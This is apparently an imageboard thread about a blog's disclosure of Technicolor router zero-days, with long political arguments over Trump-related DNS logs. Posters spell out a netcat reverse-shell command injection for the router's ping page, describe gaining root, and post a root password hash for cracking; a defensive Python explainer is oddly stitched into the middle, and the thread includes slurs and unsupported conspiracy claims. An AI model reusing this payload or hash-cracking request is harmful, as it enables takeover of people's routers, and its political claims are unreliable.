HAPPENING: new 0-days released!

uh oh!


forgot link: weaponizedautism.wordpress.com/2017/07/14/vulnerabilities-in-technicolor-adsl-residential-gateways/

This is the same guy who posted a super long analysis of the fake DNS logs that the FBI used to get a FISA warrant on Trump tower. Seems like the guy really knows his shit.

Yeah this is pretty unethical.
I don't support releasing zero days into the wild like this before contacting the vendor. At least give the vendor a chance to ignore or blow smoke up your ass before releasing it.

So... lay it to me straight, how bad is this?

Are we talking R-101, or Hindenburg levels of catastrophe?

(one being bad but ultimately a blip in the consciousness of the consumer while the other effectively destroyed the consumer use of rigid airships.)

Well, he didn't disclose everything about the more severe vuln, so there's some conscience there.

But quite frankly, this is the same tech community that dropped the ball on the Trump DNS logs and CrowdStrike because muh-Trump-is-Hitler. Anons had been posting the DNS analysis to tech forums for months and had threads deleted + accounts banned because either muh-WordPress-is-lame or muh-Trump-is-Hitler.

What's this about fake DNS logs?

I've kinda been off in the woods working for the forest service and this is kinda the first I heard of this.

I suspect it's largely just going to be a hit in the router equivalent of the jailbreaking community. Will irk a lot of ISP engineers. He admits it's not likely going to be wormified.

Having said that, there are suggestions that new kinds of vulnerabilities may be involved. The fd_set thing, if it's what I think it is, is a very obscure kind of vuln discussed on OpenBSD lists like maybe 15 years ago. But that's not what I think the ultimate attack "class" is.

First feeling was that he was bluffing, until I saw the first post on the blog. He's not bluffing.

ahhahaha
isp cucks btfo

This isn't bad at all, it only means shit will finally get fixed.
At the cost of your data of course.

So.. a fuckton of small shit that'll be annoying in the short term, and maybe one or two things that stirs up a small panic in the consumers if it gets traction with the media then?

>isp cucks btfo
wants their tard of the day back

>fake DNS logs
in short term
muh-russian hacker

Yeah, I mean, he himself isn't blowing this out of proportion. Even his DNS post is a lot more restrained than I guess some of us keep in mind. Like, he leaves open the possibility of innocent explanations for the DNS manipulation, but we tend to ignore that because it's not sexy.

a. ignored altogether
b. has his words twisted by people and hyped into things he's not re

here's the link in that case, friend
Sup Forums.org/b/

Literally nothing. He found the person who leaked the logs, but offered no real proof that they were fake. You can configure BIND to log without showing port and its not unreasonable to do so.

Also the idea was that the bank and trump were communicating, not that trump was solely pinging alfa bank. Just saying that the pings were from Alfa bank to Trump makes the logs fake is disingenous

>:::::::;nc [machine_IP] [machine_port] -e /bin/sh
lol

Can you configure BIND to put the sought IP address as the nameserver address in parentheses?

>You can configure BIND to log without showing port

Prove that you can configure BIND to log in this manner:

client 217.12.97.15 query:

>Also the idea was that the bank and trump were communicating, not that trump was solely pinging alfa bank. Just saying that the pings were from Alfa bank to Trump makes the logs fake is disingenous

You don't seem to have any idea what you're talking about.

>disingenous

>>>>>>>> Sup Forums

Yeah, no, not a Trump fan, but this kind of nonsense won't stand. The logs are clearly manipulated, but what fucking Sup Forums ignores is that the author leaves open the possibility of a benign explanation for the manipulation. At worst, it could just be that she tried to present her raw data in BIND 9 format but doesn't really understand the format - which is still cause for embarrassment and possible job loss but not hell-damning.

What's his endgame?

it's open source, so yes

So your idea of "configuring BIND" is patching the source code? Lovely.

In that case, open source is irrelevant. You can patch binary code if you know what you're doing.

probably to dismantle this russia election hacking shit once and for all

It's funny, but the joke is on Technicolor, not the author. Such injection vulns for rooting a device are the Holy Grail in the rooting community because they have virtually foolproof reliability.

Been saying for years that nothing is going to change with these companies until there are legal consequences for such shitty code.

He's doing it to get people looking at the smoking gun DNS logs that help prove Trump was being set up with all this muh russia crap.

Can't ignore him now, although I'm sure the tech media will do their damndest anyways.

There was more evidence showing that the "Trump" server was also entirely fabricated.

It wasn't just the logs themselves.

that was my first post in this thread
I was just being a smartass
but yes, it'd take a few seconds

>What's this about fake DNS logs?

Okay, going off what I can remember:
>MSM: WOOOOOOW TRUMP WAS COMMUNICATION WITH RUSSIA!!!
>>A server in trump tower was communicating with a russian bank
>>>A server in trump tower exchanged some spam emails with a russian bank
>>>>A spoofed server set up by a democrat to look like it was being used by Trump was exchanging spam emails with a russian bank
>>>>>A spoofed server set up by a democrat to look like it was being used by Trump, with forged DNS logs, was exchanging spam emails with a russian server that doesn't actually exist

It got completely glossed over and ignored by the media past that initial "TRUMP RUSSIA COMMUNICATION COLLUSION TREASON IMPEACH"

I bet they'll just double down on russian hacker

Here's from the original story breaking.

Hillary posted about it the exact same minute the story broke.

And then there was this evidence that was beginning to show the entire thing was a fabrication

...

Anyways, these are just what I happened to save when it initially went down

Neat, in the UK some ISPs use Technicolor modems, wonder if it'll work with mine

Realistically, some of these vendors have a long history of telling vulnerability reporters to go and fuck themselves.

This meme about "responsible disclosure" is heavily based around supporting ensuring million dollar vendors don't look bad, and offers nothing for the community in general.

Wow, it actually did work, and they even run the ping command as root! Good shit

I'm a newbie when it comes to routers and networking; how do you connect to the router? Telnet? SSH?

I'm autistic; the article explains most of it

someone give me the TL;DR version please

With this exploit you basically need to host a reverse shell on your PC with netcat, then use the command the blog post says to exploit the "ping diagnostics" page

On that page there's a textbox for you to put in an IP address/hostname to ping, which probably just runs something like "ping -t 5 ", so if the textbox content is ":::::::;nc [machine_IP] [machine_port] -e /bin/sh" it'll also end up running that nc command after the ping command.

That nc command just connects to your reverse shell and passes all I/O to the /bin/sh executable, which basically gives you control of the whole system since all of that gets run as root.

Most well-made things would be able to detect this kind of attack easily and be able to strip the command out, it's usually just pajeet-tier code which has problems like this (and with the state of Technicolors router UI it's pretty obviously pajeet-tier)
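The post above describes the classic shape of a command-injection bug: a web form value is pasted into a shell string, so a metacharacter such as ";" turns one command into two. The following is an added example, not code from the blog post or from Technicolor's firmware, written in Python to show the vulnerable pattern next to a hardened handler. The function names, the hostname grammar and the sample inputs are all assumptions constructed for this illustration; the hardened version rejects anything that is not an IP address or a plain hostname and then passes the target to ping as a separate argv element, so no shell ever parses it.

```python
import ipaddress
import re
import subprocess
from typing import List

# Hostname grammar roughly following RFC 1123 labels: letters, digits and
# hyphens, labels joined by dots, whole name at most 253 characters.
# (Assumed grammar for this example; tighten it to what your device needs.)
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"([A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)

# Characters that let a shell start a second command or substitute input.
_SHELL_METACHARS = set(";|&$`<>()\n\r")


def build_ping_command_vulnerable(target: str) -> str:
    """The pattern the post describes: the form field is glued into a shell string.

    Anything after ';' in `target` becomes a second command once this string
    reaches a shell (os.system, popen, system(3) in C, etc.).
    """
    return "ping -c 5 " + target


def contains_shell_metachars(target: str) -> bool:
    """Detection aid: does a submitted value contain shell control characters?"""
    return any(ch in _SHELL_METACHARS for ch in target)


def is_valid_ping_target(target: str) -> bool:
    """True only for an IP address (v4 or v6) or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.match(target) is not None


def build_ping_command_hardened(target: str) -> List[str]:
    """Validate the target, then return an argv list (no shell string at all).

    Even if validation were bypassed, a list passed to subprocess without
    shell=True is handed to execve() as separate arguments, so ';' or '&&'
    would only be a (failing) hostname, never a new command.
    """
    if not is_valid_ping_target(target):
        raise ValueError(f"rejected ping target: {target!r}")
    return ["ping", "-c", "5", target]


def run_ping_hardened(target: str, timeout: float = 10.0) -> str:
    """Run the hardened command and return ping's output (not used by the tests)."""
    argv = build_ping_command_hardened(target)
    completed = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return completed.stdout


if __name__ == "__main__":
    # Constructed sample inputs: a normal target and an injection-shaped one.
    samples = ["8.8.8.8", "example.com", "1.1.1.1; id", "::1"]
    for s in samples:
        print(f"{s!r}: metachars={contains_shell_metachars(s)} "
              f"valid={is_valid_ping_target(s)}")
```

The vulnerable builder is kept only so the difference is visible side by side; in a real handler the shell string should not exist at all. The `contains_shell_metachars` check is useful as a logging or WAF-style signal (a diagnostics form should never legitimately receive these characters), but the actual defence is the allow-list validation plus passing argv directly to the process.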

>That nc command just connects to your reverse shell and passes all I/O to the /bin/sh executable, which basically gives you control of the whole system since all of that gets run as root.
i fucking hate indians

And "responsible disclosure" in practice amounts to "letting the government know first so it can use the shit for three months."

What model do you have?

i'm surprised no one has exploited RomPager yet, it's the most used service in the world, (router modem web server)...

Tell me as I can't be bothered reading the autist blog. Is this only exploitable on a local network?

...

Underage detected.

Nice link retard

The CWMP one will be exploitable across the Internet for many users, though as the post admits, it's not likely to be done so widely.

As notes, rompager is more straightforward to exploit, yet I'm not aware of it actually being targeted en masse.

the most recent major ones from wikileaks and shadowbroker were ignored by the vendors and allowed to be taken advantage of by governments
releasing them was the best way to fix them

Tnx user.

By this point posting this image should result in an autoban.
I only ever see it posted at leaks, non-pc news outlets and other content certain groups want to not get attention.
It's as if the purpose of the macro was to silence discussion and scare people.

perhaps no one bad enough has been able to grok the assembler needed.. still very worrying, I wonder how resilient the internet is to that scale of DDoS these days since the old days that kids on IRC took down amazon and ebay.

TL;DR

Would It work for non-technicolor things?

Sorry was away for a bit, it's a MediaAccess TG589vac, supplied by SSE (an ISP in the UK)
Runs v15.2 which is actually pretty old afaik, last I checked couldn't find any newer versions for this model though.

Also if anyones interested in the shadow file here it is, would be neat if someone can crack that hash:
root:$1$LxlsOy8R$vjiUURbU9Y9sDSd.fevT0.:0:0:99999:7:::
daemon:*:0:0:99999:7:::
ftp:*:0:0:99999:7:::
network:*:0:0:99999:7:::
nobody:*:0:0:99999:7:::

>Slate asks clinton campaign for comment.
>"Don't make a statement until the story breaks at xyz"
>???????
>???????
>You're retarded

FS user here.

huh... if all that is accurate.. I'm not sure what this would be considered? Identity theft, or could it be construed into some form of slander?

Is there even case law concerning presuming a person's identity and then using that presumed identity to instigate a criminal investigation against the actual person?

Why do you.. and other people think this is a crime that ought to be investigated in the first place? Even if Trump was in contact with foreign entities with the expectation that they'd help him get elected, the punishment for that is nothing more than a slap on the wrist. It's not actually a crime.

USA would need to be at war with Russia for this to become a crime.

>Why do you.. and other people think this is a crime that ought to be investigated in the first place? Even if Trump was in contact with foreign entities with the expectation that they'd help him get elected, the punishment for that is nothing more than a slap on the wrist. It's not actually a crime.

I don't consider the potential contact between trump and the Russians as a crime, I mean FFS there's recordings of Obama talking with Medvedev prior to the 2012 election promising more leeway with Russia after the fact, this is a nothing-burger by comparison. I'm actually more concerned about the alleged methods that are said to have been used to bring about a criminal investigation in the first place. I don't really consider it a crime at this point. Especially with the fact that it's been investigated to death and if there was any true connection/collusion etc there'd have been charges and an indictment by now.

I was going to say that this is literally nothing, but I figure that's just a knee-jerk reaction to the fact that Sup Forums's dumb rednecks are posting this like it's the Internet apocalypse.

This isn't the Internet apocalypse, as the person admits himself, but I can't in good faith deny that, going by the three posts as a whole, especially the fbsd one, there's something unique happening here. I don't understand his target choices, though. He certainly has the skill set for top-tier vulns, so why does he direct it at such seemingly lame bullshit? The fbsd ones, for instance, you essentially have to have God access to the Internet to exploit, so they're nothingburgers for the vast majority of people. He has to know that, so it's very strange he seems to have spent weeks on it.

P.S. But what's also very strange is that he gave fbsd developers a complete fix, they stalled forever, and then released an incomplete fix. I remember this actually. They eventually had to issue a rare mea culpa.

This idiot has been smashing on my router since Christmas. I hope he gets shot. Straight up.

P.P.S. Then there's the fact he doesn't put a name to any of it, even when praised, as he was for the fbsd work. Even the weaponizedautism theme looks like some ruse. I doubt he even cares that much for Trump, quite frankly. Some of this work requires very keen insight and an unforgivingly ruthless approach toward people's flawed thinking and assumptions. There's no way someone like that could remain a Trump fan for long, let's face it.

root

Well some wordpress bloggers exposed how fake those logs were and no one cared because it was not posted on leddit and those who tried to post it on the free speech platform got downvoted to hell (sources, me)

Also yes those logs were horse shit from day one but the fun thing is not the initial logs its the castle that the media built around them, making articles citing as the origin of all this drama sources that someone dropped on a tor link that no longer exists. Every 2 months some idiot hipster press shill makes an article based on an article of an article of fake sources, and people eat it up all the time.

The fake media made a rock tower that won't fall because people are too ignorant to push it down.

My retarded TG588v doesn't even have the option for ping in the webgui.

>bunch of modems used in 3rd world countries


wow who cares

>Even if Trump was in contact with foreign entities with the expectation that they'd help him get elected, the punishment for that is nothing more than a slap on the wrist. It's not actually a crime.
What? It's high treason and the punishment is the death penalty. It's a crime so severe that it hasn't happened in the history of the US.

Botnet makers

like holy shit son, this.
> minimum 10 million free Sup Forums ban bypass machines

they're roots too, you could probably take out a few datacenters with a botnet of that size, even if all of the zombies were all about dialup speed.

They're used in the UK, Australia, and many Western European countries, for starters, but are often rebranded, so people don't realize they have Technicolor gear.

The trouble is that in the ocean of abuse online, adding another bucket of water doesn't really change the dismal picture all that much. There's just way too much bad shit already happening.

Like I said... 3rd world countries.

it's basically entrapment

what is lorenzen

retard

that joke probably sounded funnier in your head

Now that I've had some coffee and time to mull on it, I'd actually go so far as to say it was falsification of evidence.

>and with the state of Technicolors router UI it's pretty obviously pajeet-tier)

Well, now i fucking know why it takes 10 fucking seconds to change between urls in those pieces of shit, and how fucking godawful it is to open a bunch of fucking ports.

0 day in a technicolour product is like a 0 day in Windows XP back in ~2005. Completely and utterly uninteresting unless you're using it or trying to hack it.

Their routers are GARBAGE. Utter garbage. They can't even function normally, the fucking thing crashes all the time.

>This is the same guy who posted a super long analysis of the fake DNS logs that the FBI used to get a FISA warrant on Trump tower. Seems like the guy really knows his shit.

No, he is making shit up to satisfy Sup Forums and r/the_donald.

i don't speak nerd, what does this mean?

Did you actually look at the analysis?

I don't care for trump but the analysis puts the fisa warrant application in a questionable light, which actually makes sense given that it was denied in the first place.

>Cognitive dissonance
She lost faggot, get over it.

Treason is LITERALLY.
I repeat L I T E R A L L Y
Only possible when US is at WAR with Russia.
I repeat W A R.
Unless you somehow manage to get US and Russia into WAR, then what he did (if he even did it at all) is not TREASON. Use the word correctly, you mentally deficient fucktard.

Neither does the law. Which is the point. Treason requires a state of war.

>technicolor
that kinda sucks, i kinda like the folks working on their tech support (non-pajeets that actually know what they are doing)